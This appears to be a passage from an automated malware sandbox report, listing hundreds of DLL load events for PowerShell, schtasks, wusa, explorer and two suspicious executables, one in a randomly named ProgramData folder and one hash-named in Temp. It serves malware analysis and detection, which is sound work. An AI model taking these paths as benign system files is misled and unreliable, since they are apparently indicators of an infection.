                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
                        Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
                        Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeSection loaded: apphelp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\servicing\TrustedInstaller.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\servicing\TrustedInstaller.exeSection loaded: dbgcore.dll
                        Source: C:\Windows\servicing\TrustedInstaller.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: seclogon.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: msimg32.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: msvcr100.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: winmm.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: powrprof.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: umpdc.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: wtsapi32.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: winsta.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: sxs.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                        Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\explorer.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                        Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                        Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                        Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
                        Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: napinsp.dll
                        Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dll
                        Source: C:\Windows\explorer.exeSection loaded: wshbth.dll
                        Source: C:\Windows\explorer.exeSection loaded: nlaapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: winrnr.dll
                        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: amsi.dll
                        Source: C:\Windows\explorer.exeSection loaded: profapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: msasn1.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
                        Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
                        Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
